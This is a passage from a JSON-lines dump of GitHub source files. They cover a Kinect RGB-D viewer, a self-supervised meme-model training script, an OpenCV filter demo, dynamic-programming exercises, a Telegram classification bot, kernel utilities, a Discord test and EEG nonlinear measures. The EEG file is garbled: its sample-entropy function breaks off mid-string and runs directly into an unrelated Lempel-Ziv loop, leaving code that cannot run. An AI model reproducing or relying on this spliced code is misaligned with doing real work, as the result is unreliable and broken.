\t\t\t\t\t\t\t #\n\t\t\t\t#===================================================================================\n\t\t\t\trgb_image = cv2.cvtColor(self.rgb, cv2.COLOR_BGR2RGB)\n\t\t\t\trgb_image = Image.fromarray(rgb_image)\n\t\t\t\trgb_image = ImageTk.PhotoImage(rgb_image)\n\n\t\t\t\tdepth_image = colorize(self.depth, (300, 1100))\n\t\t\t\tdepth_image = Image.fromarray(depth_image)\n\t\t\t\tdepth_image = ImageTk.PhotoImage(depth_image)\n\n\t\t\t\tif (self.rgb_panel or self.depth_panel) is None :\n\t\t\t\t\tself.rgb_panel = tki.Label(image=rgb_image)\n\t\t\t\t\tself.rgb_panel.image = rgb_image\n\t\t\t\t\tself.rgb_panel.pack(side=\"left\", padx=10, pady=10)\n\n\t\t\t\t\tself.depth_panel = tki.Label(image=depth_image)\n\t\t\t\t\tself.depth_panel.image = depth_image\n\t\t\t\t\tself.depth_panel.pack(side=\"right\", padx=10, pady=10)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tself.rgb_panel.configure(image=rgb_image)\n\t\t\t\t\tself.rgb_panel.image = rgb_image\n\n\t\t\t\t\tself.depth_panel.configure(image=depth_image)\n\t\t\t\t\tself.depth_panel.image = depth_image\n\t\t\t\t#=========================================================================================\n\n\t\t\t\tif self.flag_record:\n\t\t\t\t\tself.record.write_capture(self.frame)\n\t\t\t\t\tif time()-self.start >= 2.5:\n\t\t\t\t\t\tself.stop_callback()\n\n\t\texcept RuntimeError as e:\n\t\t\tprint(\"Runtime error: \",e)\n\t\t\n\tdef on_close(self):\n\t\tprint(\"closing\")\n\t\tself.stop_event.set()\n\t\tself.cap.stop()\n\t\tself.root.destroy()\n\t\tself.root.quit()","repo_name":"nishantg96/Kinect-RGB-D-Recorder","sub_path":"common/tk_utils.py","file_name":"tk_utils.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71603909902","text":"from arguments import get_args \nfrom model.unsupervised import UnsupervisedModel\nimport torch \nfrom data.dataClass import get_unsupervision_dataset\nimport os \nimport logging \nfrom loss import MMContrastiveLoss \nfrom lightly.loss import ntx_ent_loss\nfrom utils.unsupervisedUtils import save_embed,save_config_file,get_batch,EarlyStopping,save_checkpoint,compute_loss\nfrom torch.cuda.amp import GradScaler, autocast\nfrom tqdm import tqdm \nimport wandb \n\ndef train_on_one_epoch(args,model,train_loader,optimizer,scaler,n_iter,epoch_counter,meme_mmloss=None,meme_floss=None,mmcontr_loss=None):\n trainiterator = iter(train_loader)\n for loader_idx in range(len(train_loader)):\n batch = get_batch(args,trainiterator)\n\n if args.dryrun:\n if loader_idx == 4:\n print(\"Dry Run in Unsupervised train complete, exiting\")\n break\n\n with autocast(enabled=args.fp16_precision):\n out = model(batch)\n if args.memeloss:\n loss = compute_loss(args,out,epoch_counter,meme_mmloss=meme_mmloss,meme_floss=meme_floss)\n elif args.mmcontr:\n loss = compute_loss(args,out,epoch_counter,mmcontr_loss=mmcontr_loss)\n\n optimizer.zero_grad()\n\n scaler.scale(loss).backward()\n\n scaler.step(optimizer)\n scaler.update()\n n_iter += 1\n return loss\n\ndef train(args,model,earlyStopper,train_loader,optimizer,scaler,n_iter,meme_mmloss=None,meme_floss=None,mmcontr_loss=None):\n for epoch_counter in tqdm(range(args.epochs), disable=args.no_tqdm):\n loss = train_on_one_epoch(args,model,train_loader,optimizer,scaler,n_iter,epoch_counter,meme_mmloss=meme_mmloss,meme_floss=meme_floss,mmcontr_loss=mmcontr_loss)\n # earlyStopper(loss.item())\n\n print(\"Epoch: {}\\tLoss: {}\".format(epoch_counter, loss.item()))\n wandb.log({\"loss\": 
loss.item()})\n wandb.log({\"epoch\": epoch_counter})\n if args.dryrun:\n break\n\n if epoch_counter >= 10:\n scheduler.step()\n lr = optimizer.param_groups[0]['lr']\n wandb.log({\"learning rate\": lr})\n if epoch_counter % 5 == 0:\n checkpoint_name = 'checkpoint_{:04d}.pth.tar'.format(epoch_counter)\n save_checkpoint({\n 'epoch': args.epochs,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, is_best=False, filename=os.path.join(log_dir, checkpoint_name))\n print(f\"Checkpoint created at {checkpoint_name}\")\n\n if earlyStopper.early_stop:\n print(\"Early Stopping, Loss didn't decrease for several epochs\")\n break\n\n\nargs = get_args()\n\nif args.dryrun:\n args.experiment = 'dryrun'\n\nassert (not args.simclr) or (args.n_views > 1), \"SimCLR requires at least 2 image views\"\n\nif not args.disable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\nelse:\n args.device = torch.device('cpu')\n args.gpu_index = -1\n\nprint(args)\nwandb.init(project=\"meme_experiments\", entity=\"meme-analysts\",mode=\"disabled\")\nwandb.run.name = args.experiment\nckpt_use = args.ckpt != ''\nmodel = UnsupervisedModel(args.arch, args.txtmodel, args.out_dim, args.dropout, args.projector, not ckpt_use, not ckpt_use)\nmodel.to(args.device)\nprint(f\"Unsupervised Model Name: {model.name}\")\n\nif ckpt_use:\n model.load_state_dict(torch.load(args.ckpt, map_location=args.device)['state_dict'])\n print(f\"Model Loaded from {args.ckpt}\")\n\ntrain_dataset = get_unsupervision_dataset(args)\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True)\noptimizer = torch.optim.Adam(model.parameters(), args.lr, weight_decay=args.weight_decay)\nscheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(train_loader), eta_min=0,\n last_epoch=-1)\npytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)\nprint(\"Total Parameters: \", pytorch_total_params)\n\nsave_folder = '/home/viet/SSLMemes/saved_model/'\nif not os.path.exists(save_folder):\n os.mkdir(save_folder)\n\nlog_dir = os.path.join(save_folder,args.experiment)\nif not os.path.exists(log_dir):\n os.mkdir(log_dir)\nmmcontr_loss,meme_mmloss,meme_floss = None, None, None \nwith torch.cuda.device(args.gpu_index):\n if args.mmcontr:\n mmcontr_loss= MMContrastiveLoss(\n margin=args.margin,\n measure=args.measure,\n max_violation=args.max_violation\n ).to(args.device)\n if args.memeloss:\n meme_mmloss = MMContrastiveLoss(\n margin=args.margin,\n measure=args.measure,\n max_violation=args.max_violation\n ).to(args.device)\n meme_floss = ntx_ent_loss.NTXentLoss(args.temperature,args.moco_size).to(args.device)\n if args.vis_embed:\n log_dir = '/home/viet/SSLMemes/saved_model/'\n save_embed(args,model,train_loader,log_dir)\n else:\n scaler = GradScaler(enabled=args.fp16_precision)\n save_config_file(log_dir,args)\n n_iter = 0\n print(f\"Start SimCLR training for {args.epochs} epochs.\")\n print(f\"Using args: {args}\")\n\n earlyStopper = EarlyStopping(patience=10)\n train(args,model,earlyStopper,train_loader,optimizer,scaler,n_iter,meme_mmloss=meme_mmloss,meme_floss=meme_floss,mmcontr_loss=mmcontr_loss)\n print(\"Training has finished.\")\n\n checkpoint_name = 'last_checkpoint-{}.pth.tar'.format(model.name)\n filename = os.path.join(log_dir, checkpoint_name)\n save_checkpoint({\n 'epoch': args.epochs,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': 
optimizer.state_dict(),\n }, is_best=False, filename=filename)\n\n print(f\"Model checkpoint and metadata has been saved at {log_dir}.\")\n print(\"Completed self-supervised training.\")\n","repo_name":"FPTU-Thesis-CSAI/SemiMemes","sub_path":"src/trainUnsupervisedExpienet.py","file_name":"trainUnsupervisedExpienet.py","file_ext":"py","file_size_in_byte":6061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"19353555851","text":"import os\nimport numpy as np\nimport cv2\nfrom varname.helpers import debug\nfrom sports_dataloader import load_img_paths \n\n\n\n\ndataset_path = 'datasets/sportsMOT_volley_starter_pack/sportsMOT_volley_light_dataset'\ndataset_images = load_img_paths(dataset_path)\n\nfor image_path in dataset_images.values():\n img = cv2.imread(image_path)\n img2draw = img.copy()\n img2draw = cv2.resize(img2draw, None, fx=0.5, fy=0.5)\n kernel = np.array([ #edge detection\n [-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]\n ])\n # kernel = np.array([ #sharpen\n # [0, -1, 0],\n # [-1, 5, -1],\n # [0, -1, 0]\n # ])\n filtered_image = cv2.filter2D(img2draw, -1, kernel)\n out_image = np.vstack([img2draw, filtered_image])\n cv2.imshow('test', out_image)\n cv2.waitKey(-1)\n","repo_name":"petr-nazarov/Liga-learn-ml","sub_path":"image_convolution.py","file_name":"image_convolution.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13875510665","text":"# https://codeforces.com/blog/entry/78195\r\nN, S = map(int,input().split())\r\nA = list(map(int,input().split()))\r\nmod = 998244353\r\ndp = [[0 for j in range(S + 1)] for i in range(N + 1)]\r\ndp[0][0] = 1\r\n\r\n# dp[i][j] is the answer over all subsets of the first i elements of the array A that sum to j.\r\nfor i in range(N) : \r\n for j in range(S + 1) : \r\n # If we skip A[i], we can place in subset or not (two options)\r\n dp[i + 1][j] += 2 * dp[i][j]\r\n dp[i + 1][j] %= mod \r\n\r\n # If we pick A[i], increase the sum by A[i] and no. 
of elements by i.\r\n if j + A[i] <= S : \r\n dp[i + 1][j + A[i]] += dp[i][j]\r\n dp[i + 1][j + A[i]] %= mod\r\n \r\nprint(dp[N][S])\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Given a sequence A, find number of subsets whose sum is S\r\ndef my_attempt():\r\n # I just calculated the subset of numbers who sum to S.\r\n n, S = map(int, input().split())\r\n arr = list(map(int, input().split()))\r\n dp = [[-1]*(n+1) for _ in range(S+1)]\r\n def subsetSum(s, n, arr, v):\r\n if dp[s][n]!=-1:\r\n return dp[s][n]\r\n else:\r\n if s == 0:\r\n return 1\r\n elif s!=0 and n==0:\r\n return 0\r\n else:\r\n if arr[n-1] > s:\r\n dp[s][n] = subsetSum(s, n-1, arr, v)\r\n return dp[s][n]\r\n else:\r\n exclude = subsetSum(s, n-1, arr, v)\r\n\r\n v1 = v.copy()\r\n v1.append(arr[n-1])\r\n include = subsetSum(s - arr[n-1], n-1, arr, v1)\r\n\r\n\r\n dp[s][n] = include + exclude\r\n return dp[s][n]\r\n\r\n v = []\r\n print('Number of subsets whose elements add upto S:', subsetSum(S, n, arr, v))\r\n\r\n \r\n","repo_name":"anoubhav/Codeforces-Atcoder-Codechef-solutions","sub_path":"Atcoder/169/F.py","file_name":"F.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25007575328","text":"\"\"\"best_sum_tabulation.py\"\"\"\nfrom typing import List, Optional, Any\n\"\"\"\nPROBLEM:\n\nWrite a function 'best_sum(target_sum, numbers)' that takes in a\ntarget_sum and an array of numbers as arguments.\n\nThe function should return an array containing the shortest\ncombination of numbers that add up to exactly the target_sum.\n\nIf there is a tie for the shortest combination, you may return any\none of the shortest.\n\"\"\"\n\n# Recursive method for reference\n'''\ndef best_sum_recursive(target_sum: int,\n numbers: List[int]) -> Optional[List[int]]:\n \"\"\"Recursive method for solving problem using no caching\n or memoization.\"\"\"\n if target_sum < 0:\n return None\n if target_sum in numbers:\n return [target_sum]\n shortest_combo: Optional[List[int]] = None\n for num in numbers:\n new_target_sum: int = target_sum - num\n adders: Optional[List[int]] = best_sum_recursive(\n new_target_sum, numbers)\n if adders is not None:\n combo: List[int] = adders.copy()\n combo.insert(0, num)\n if shortest_combo is None or len(combo) < len(shortest_combo):\n shortest_combo = combo\n return shortest_combo\n'''\n\n\ndef best_sum(target_sum: int, numbers: List[int]) -> Optional[List[int]]:\n \"\"\"Iterative method for solving problem using\n tabulation.\"\"\"\n table: List[Any] = [None] * (target_sum + 1)\n table[0] = []\n for i in range(target_sum):\n if table[i] is not None:\n for num in numbers:\n advance: int = i + num\n if advance <= target_sum:\n if not table[advance] or len(table[i]) + 1 < len(\n table[advance]):\n table[advance] = table[i].copy()\n table[advance].append(num)\n target_sum_list: Optional[List[int]] = table[target_sum]\n return target_sum_list\n\n\n# TESTS\nassert best_sum(7, [5, 3, 4, 7]) == [7]\nassert best_sum(7, [5, 3, 4]) == [3, 4]\nassert best_sum(8, [2, 3, 5]) == [3, 5]\nassert best_sum(8, [1, 4, 5]) == [4, 4]\nassert best_sum(100, [1, 2, 5, 25]) == [25, 25, 25, 25]\n","repo_name":"plasticuproject/dynamic_programming_course","sub_path":"sum/best_sum/best_sum_tabulation.py","file_name":"best_sum_tabulation.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"38550835087","text":"def main(search, user_id, user_name):\n 
import pandas as pd\n from os import getcwd\n import telepot\n\n\n token = \"\"\n bot = telepot.Bot(token)\n\n classification_index = pd.read_excel(r'classification_index_arranged.xlsx')\n\n list_of_titles = classification_index[\"title\"].tolist()\n list_of_file_names = classification_index[\"file_name\"].tolist()\n\n search = search\n index_no = []\n index_no_ = 0\n mark = []\n mark_ = 0\n for i in list_of_titles:\n j = i.split()\n for k in j:\n for l in range(len(search)):\n search\n if k.upper() == search[l].upper():\n mark_ += 1\n mark.append(mark_)\n index_no.append(list_of_titles[index_no_])\n mark_ = 0\n index_no_ += 1\n greatest_mark = 0\n greatest_markman =\"\"\n count = 0\n for i in mark :\n if int(i) > greatest_mark:\n greatest_mark = i\n greatest_markman = index_no[count]\n count += 1\n greatest_markman = str(greatest_markman)\n classification = greatest_markman\n index_no = list_of_titles.index(classification)\n file_name = list_of_file_names[index_no]\n FILE = file_name\n user_name = user_name\n file_name = str(getcwd()) + \"/classifications/classifications/\" + file_name\n caption_ = \"Classification of \" + greatest_markman\n bot.sendPhoto(chat_id = user_id, photo=open(file_name, \"rb\"), caption=caption_)\n","repo_name":"akhilrajs/drug-of-choice-bot","sub_path":"classification_table.py","file_name":"classification_table.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"29517325359","text":"import random \nimport pandas as pd\nimport os\n\ndf = pd.read_csv('Results.csv')\nmodel = {}\nanswers=[]\nstep=5\nh=0\nfor i in range(0,len(df), step):\n data = df['answer_text'][i:i+step]\n for line in data:\n line = line.lower().split()\n for i, word in enumerate(line):\n if i == len(line)-1: \n model['END'] = model.get('END', []) + [word]\n else: \n if i == 0:\n model['START'] = model.get('START', []) + [word]\n model[word] = model.get(word, []) + [line[i+1]] \n\n answer = ''\n for i in range(step*3):\n generated = []\n while True:\n if not generated:\n words = model['START']\n elif generated[-1] in model['END']:\n break\n else:\n words = model[generated[-1]]\n generated.append(random.choice(words))\n \n answer = answer + \"'\" + ' '.join(generated) + \"',\"\n if i%3==0: \n answers.append(answer.strip(','))\n answer = ''\n\nprint('Total answers : ', len(answers))\nprint('Total questions : ', len(df))\ndf['distractor'] = answers\ndf.to_csv('exp.csv', index=None)\n \n","repo_name":"weeping-angel/ValueLabs-ML-Hiring-Challenge-2019","sub_path":"MarkovChainSentenceGeneration/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"} +{"seq_id":"6047207315","text":"import numpy as np\nfrom typing import Union, Optional\nfrom alibi.utils.distance import squared_pairwise_distance\n\n\nclass GaussianRBF:\n def __init__(self, sigma: Optional[Union[float, np.ndarray]] = None) -> None:\n \"\"\"\n Gaussian RBF kernel: :math:`k(x,y) = \\\\exp(-\\\\frac{||x-y||^2}{2\\\\sigma^2})`.\n A forward pass takes a batch of instances `x` of size `Nx x f1 x f2 x ...` and\n `y` of size `Ny x f1 x f2 x ... ` and returns the kernel matrix of size `Nx x Ny`.\n\n Parameters\n ----------\n sigma\n Kernel bandwidth. 
Not to be specified if being inferred or trained.\n Can pass multiple values to evaluate the kernel with and then average.\n \"\"\"\n super().__init__()\n self.config = {'sigma': sigma}\n\n if sigma is None:\n self.log_sigma = np.empty(1, dtype=np.float32)\n self.init_required = True\n else:\n if not isinstance(sigma, np.ndarray):\n sigma = np.array(sigma)\n\n sigma = sigma.reshape(-1,).astype(np.float32) # [Ns,]\n self.log_sigma = np.log(sigma)\n self.init_required = False\n\n @property\n def sigma(self) -> np.ndarray:\n return np.exp(self.log_sigma)\n\n def __call__(self, x: np.ndarray, y: np.ndarray, infer_sigma: bool = False) -> np.ndarray:\n \"\"\"\n Computes the kernel matrix between `x` and `y`.\n\n Parameters\n ----------\n x\n The first array of data instances.\n y\n The second array of data instances.\n infer_sigma\n Whether to infer `sigma` automatically. The `sigma` value is computed based on the median distance value\n between the instances from `x` and `y`.\n\n Returns\n -------\n Kernel matrix between `x` and `y` having the size of `Nx x Ny` where `Nx` is the number of instances in `x` \\\n and `y` is the number of instances in `y`.\n \"\"\"\n y = y.astype(x.dtype)\n x, y = x.reshape((x.shape[0], -1)), y.reshape((y.shape[0], -1)) # flatten\n dist = squared_pairwise_distance(x, y) # [Nx, Ny]\n\n if infer_sigma or self.init_required:\n n = min(x.shape[0], y.shape[0])\n n = n if np.all(x[:n] == y[:n]) and x.shape == y.shape else 0\n n_median = n + (np.prod(dist.shape) - n) // 2 - 1\n sigma = np.expand_dims((.5 * np.sort(dist.reshape(-1))[n_median]) ** .5, axis=0)\n self.log_sigma = np.log(sigma)\n self.init_required = False\n\n gamma = np.array(1. / (2. * self.sigma ** 2), dtype=x.dtype) # [Ns,]\n # TODO: do matrix multiplication after all?\n kernel_mat = np.exp(-np.concatenate([(g * dist)[None, :, :] for g in gamma], axis=0)) # [Ns, Nx, Ny]\n return np.mean(kernel_mat, axis=0) # [Nx, Ny]\n\n\nclass GaussianRBFDistance:\n def __init__(self, sigma: Optional[Union[float, np.ndarray]] = None):\n \"\"\"\n Gaussian RBF kernel dissimilarity/distance: :math:`k(x, y) = 1 - \\\\exp(-\\\\frac{||x-y||^2}{2\\\\sigma^2})`.\n A forward pass takes a batch of instances `x` of size `Nx x f1 x f2 x ...` and\n `y` of size `Ny x f1 x f2 x ...` and returns the kernel matrix of size `Nx x Ny`.\n\n Parameters\n ----------\n sigma\n See :py:meth:`alibi.utils.kernel.GaussianRBF.__init__`.\n \"\"\"\n super().__init__()\n self.kernel = GaussianRBF(sigma=sigma)\n\n def __call__(self, x: np.ndarray, y: np.ndarray, infer_sigma: bool = False) -> np.ndarray:\n kmatrix = self.kernel(x, y, infer_sigma)\n return 1. - kmatrix\n\n\nclass EuclideanDistance:\n def __init__(self) -> None:\n \"\"\"\n Euclidean distance: :math:`k(x, y) = ||x-y||`. A forward pass takes a batch of instances `x` of\n size `Nx x f1 x f2 x ... 
` and `y` of size `Ny x f1 x f2 x ...` and returns the kernel matrix `Nx x Ny`.\n \"\"\"\n pass\n\n def __call__(self, x: np.ndarray, y: np.ndarray) -> np.ndarray:\n \"\"\"\n Computes the kernel distance matrix between `x` and `y`.\n\n Parameters\n ----------\n x\n The first array of data instances.\n y\n The second array of data instances.\n\n Returns\n -------\n Kernel distance matrix between `x` and `y` having the size of `Nx x Ny`, where `Nx` is the number of \\\n instances in `x` and `y` is the number of instances in `y`.\n \"\"\"\n y = y.astype(x.dtype)\n x, y = x.reshape((x.shape[0], -1)), y.reshape((y.shape[0], -1)) # flatten\n dist = np.sqrt(squared_pairwise_distance(x, y)) # [Nx, Ny]\n return dist\n","repo_name":"SeldonIO/alibi","sub_path":"alibi/utils/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":2207,"dataset":"github-code","pt":"47"} +{"seq_id":"70251940622","text":"import unittest\n\nfrom notification.service.notification_service import DiscordNotificationService\n\n\nclass TestDiscordNotificationService(unittest.IsolatedAsyncioTestCase):\n\n async def test_discord_send_notification(self):\n discord_service = DiscordNotificationService()\n try:\n await discord_service.send_notification(\"TEST: Hello World\")\n except Exception as e:\n self.fail(f\"Failed to send Discord notification: {e}\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"grygy/another-todo-app","sub_path":"notification_service/tests/notification/service/test_discord_service.py","file_name":"test_discord_service.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3725473616","text":"# Built-in imports\nimport math\nimport ctypes\n\n# External imports\nimport numpy as np\nfrom scipy.spatial.distance import pdist\nfrom scipy.signal import decimate\n\n# Medusa imports\nfrom medusa.components import ThreadWithReturnValue\nfrom medusa.utils import check_dimensions\n\n\ndef central_tendency_measure(signal, r):\n \"\"\"\n This method implements the central tendency measure (CTM). This parameter is\n useful to quantify the variability of a signal. It is based on calculating\n the second-order differences diagram of the time series and then counting\n the points within a radius \"r\". CTM assigns higher values to less variable\n signals\n\n References\n ----------\n Cohen, M. E., Hudson, D. L., & Deedwania, P. C. (1996). Applying\n continuous chaotic modeling to cardiac signal analysis. IEEE Engineering in\n Medicine and Biology Magazine, 15(5), 97-102.\n\n Parameters\n ----------\n signal : numpy.ndarray\n Signal with shape [n_epochs, n_samples, n_channels].\n r : double\n Radius used to compute the CTM.\n\n Returns\n -------\n ctm : numpy.ndarray\n CTM values for each channel in \"signal\". 
[n_epochs, n_channels].\n \"\"\"\n\n # Error check\n if not np.issubdtype(signal.dtype, np.number):\n raise ValueError('data matrix contains non-numeric values')\n\n # Check dimensions\n signal = check_dimensions(signal)\n\n # Signal dimensions\n n_epo = signal.shape[0]\n n_samp = signal.shape[1]\n n_cha = signal.shape[2]\n\n # Values within a range (mean +- 3 std)\n upper_bound = np.mean(signal, axis=1) + 3 * np.std(signal, axis=1)\n lower_bound = np.mean(signal, axis=1) - 3 * np.std(signal, axis=1)\n idx_within_range = np.logical_and((signal < upper_bound[:, None, :]),\n (signal > lower_bound[:, None, :]))\n idx_out_upper = (signal > upper_bound[:, None, :])\n idx_out_lower = (signal < lower_bound[:, None, :])\n\n # Maximum value in the above defined range\n max_value = np.empty((n_epo, n_cha))\n for ep in range(n_epo):\n for ch in range(n_cha):\n max_value[ep, ch] = np.max(\n abs(signal[ep, idx_within_range[ep, :, ch], ch]), axis=0)\n\n # Normalize the values within the range by its maximum.Values above that\n # range will be 1, and below the range will be - 1\n data_norm = np.zeros_like(signal)\n data_norm[idx_within_range] = np.divide(\n signal[idx_within_range],\n np.tile(max_value, (1, n_samp, 1)).flatten()[\n idx_within_range.flatten()])\n data_norm[idx_out_upper] = 1\n data_norm[idx_out_lower] = -1\n\n # Difference time series\n y = data_norm[:, 3:n_samp, :] - data_norm[:, 2:n_samp - 1, :]\n x = data_norm[:, 2:n_samp - 1, :] - data_norm[:, 1:n_samp - 2, :]\n\n # CTM - Values below the radius 'r'\n ctm = np.sum(np.sqrt(np.square(x) + np.square(y)) < r, axis=1) / (\n n_samp - 2)\n\n return ctm\n\n\ndef sample_entropy(signal, m, r, dist_type='chebyshev'):\n \"\"\" This method implements the sample entropy (SampEn). SampEn is an\n irregularity measure that assigns higher values to more irregular time\n sequences. It has two tuning parameters: the sequence length (m) and the\n tolerance (r)\n\n Notes: IF A = 0 or B = 0, SamEn would return an infinite value.\n However, the lowest non-zero conditional probability that SampEn should\n report is A/B = 2/[(N-m-1)*(N-m)].\n SampEn has the following limits:\n - Lower bound: 0\n - Upper bound : log(N-m) + log(N-m-1) - log(2)\n\n References\n ----------\n Richman, J. S., & Moorman, J. R. (2000). Physiological\n time-series analysis using approximate entropy and sample entropy. American\n Journal of Physiology-Heart and Circulatory Physiology.\n\n Parameters\n ----------\n signal : numpy.ndarray\n Signal with shape [n_epochs, n_samples, n_channels].\n m : int\n Sequence length\n r : float\n Tolerance\n dist_type : string\n Distance metric\n\n Returns\n -------\n sampen : numpy.ndarray\n SampEn value. [n_epochs, n_channels]\n \"\"\"\n # Check dimensions\n signal = check_dimensions(signal)\n\n # Check Errors\n if m > signal.shape[1]:\n raise ValueError('Embedding dimension must be smaller than the signal '\n 'length (m 1\n if binarised_signal.shape[1] > 1:\n threads = []\n for ch in range(binarised_signal.shape[1]):\n t = ThreadWithReturnValue(target=__lz_algorithm,\n args=(binarised_signal[:, ch],))\n threads.append(t)\n t.start()\n for ch_idx, t in enumerate(threads):\n result[ep_idx, w_idx, ch_idx] = t.join()\n else:\n result[ep_idx, w_idx, :] = __lz_algorithm(binarised_signal)\n return result\n\n\ndef __lz_algorithm(signal):\n \"\"\"\n Lempel-Ziv's complexity algorithm implemented in Python.\n\n References\n ----------\n F. Kaspar, H. G. 
Schuster, \"Easily-calculable measure for the complexity of\n spatiotemporal patterns\", Physical Review A, Volume 36, Number 2 (1987).\n\n Parameters\n ---------\n signal: numpy 1D array\n Signal with shape of [n_samples]\n\n Returns\n -------\n value: float\n Result of algorithm calculations.\n\n \"\"\"\n signal = signal.flatten().tolist()\n i, k, l = 0, 1, 1\n c, k_max = 1, 1\n n = len(signal)\n while True:\n if signal[i + k - 1] == signal[l + k - 1]:\n k = k + 1\n if l + k > n:\n c = c + 1\n break\n else:\n if k > k_max:\n k_max = k\n i = i + 1\n if i == l:\n c = c + 1\n l = l + k_max\n if l + 1 > n:\n break\n else:\n i = 0\n k = 1\n k_max = 1\n else:\n k = 1\n\n value = c * (np.log2(n) / n)\n return value\n\n\ndef __binarisation(signal, w_length, w_max, multiscale=False):\n \"\"\"\n This function returns a binarised version of original signal. It can be used\n in both multiscale and simple binarisations. If multiscale mode is chosen,\n signals are shortened so that they all have the same length, taking the\n maximum window as a reference. Binarisation is performed by means of a\n median-based comparison.\n\n Parameters\n ----------\n signal: numpy 2D array\n Signal with shape [n_samples x n_channels]\n w_length: int\n Window length to perform multiscale binarisation\n w_max: int\n Value of the maximum window length\n multiscale: bool\n If is True, performs the multiscale binarisation\n\n Returns\n -------\n signal_binarised: numpy.ndarray\n Signal binarised with shape of [n_samples_shortened x n_channels]\n The n_samples_shortened parameter is calculated from w_max to ensure that\n all signals have the same length, regardless of the window length used.\n \"\"\"\n\n if multiscale:\n if w_length is None:\n raise ValueError('Width of window must be an integer value')\n if w_length % 2 == 0:\n raise ValueError('Width of window must be an odd value.')\n if w_max is None:\n raise ValueError('Maximum window width must be an integer value')\n\n # Get smoothed version from original signal\n smoothed = __multiscale_median_threshold(signal, w_length)\n\n # Useful parameters\n half_wind = int((w_length - 1) / 2)\n max_length = signal.shape[0] + 1 - w_max\n length_diff = smoothed.shape[0] - max_length\n\n # Shorten original and smoothed version\n smoothed_shortened = \\\n smoothed[int(length_diff / 2):-int(length_diff / 2), :]\n signal_shortened = \\\n signal[half_wind: signal.shape[0] - half_wind, :]\n signal_shortened = \\\n signal_shortened[int(length_diff / 2):-int(length_diff / 2), :]\n\n # Define template of binarised signal\n signal_binarised = \\\n np.zeros((signal_shortened.shape[0], signal_shortened.shape[1]))\n\n # Binarise the signal\n idx_one = signal_shortened >= smoothed_shortened\n signal_binarised[idx_one] = 1\n\n else:\n signal_binarised = np.zeros((len(signal), signal.shape[1]))\n median = np.median(signal, axis=0)\n idx_one = signal >= median\n signal_binarised[np.squeeze(idx_one)] = 1\n\n return signal_binarised\n\n\ndef __multiscale_median_threshold(signal, w_length):\n \"\"\" Signal smoothing function. For each sample, we define a window in which\n the sample is in centre position. The median value of the window is\n calculated and assigned to this sample to obtain a smoothed version of the\n original signal.\n\n References\n ----------\n Ibáñez-Molina, A. J., Iglesias-Parro, S., Soriano, M. F., & Aznarte, J. I,\n Multiscale Lempel-Ziv complexity for EEG measures. 
Clinical Neurophysiology,\n (2015), 126(3), 541–548.\n\n Parameters\n ---------\n signal: numpy 2D array\n Signal with shape of [n_samples, n_channels]\n w_length: int\n Length of window to calculate median values in smoothing process\n\n Returns\n -------\n smoothed_signal: numpy 2D array\n Smoothed version with shape of [n_samples + 1 - w_length, n_channels]\n As a result of windowing, the final samples of the signal are lost.\n\n \"\"\"\n # Template of smoothed signal\n smoothed_signal = np.zeros((\n signal.shape[0] + 1 - w_length, signal.shape[1]))\n\n half_wind = int((w_length - 1) / 2)\n\n # Index of sample to be smoothed from median window value\n index = 0\n\n # We define a window with samp in central position and\n # get median value to smooth original signal\n for samp in range(half_wind, signal.shape[0] - half_wind):\n smoothed_signal[index, :] = np.median(\n signal[samp - half_wind: samp + half_wind], axis=0)\n index += 1\n return smoothed_signal\n\n","repo_name":"medusabci/medusa-kernel","sub_path":"medusa/local_activation/nonlinear_parameters.py","file_name":"nonlinear_parameters.py","file_ext":"py","file_size_in_byte":19618,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"47"} +{"seq_id":"27777401228","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport math\nfrom slang.utils import *\nfrom slang.models import LogisticRegression, LogisticRegressionFull\nfrom slang.train import *\nimport argparse\nimport matplotlib.pyplot as plt\nimport os\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--do_full_model\", default = True, type = bool)\nparser.add_argument(\"--task\", default = \"australian\", type = str)\nparser.add_argument(\"--batch_size\", default = 64, type = int)\nparser.add_argument(\"--n_epoch\", default = 1000, type = int)\nparser.add_argument(\"--beta\", default = 0.03, type = float)\nparser.add_argument(\"--alpha\", default = 0.03, type = float)\nparser.add_argument(\"--lambda\", default = 1., type = float)\nparser.add_argument(\"--max_ranks\", nargs='+', default = [1, 5, 10], type = int)\nparser.add_argument(\"--n_iter\", default = 4, type = int)\nparser.add_argument(\"--pow\", default = 0.51, type = float)\nparser.add_argument(\"--n_samples_train\", default = 12, type = 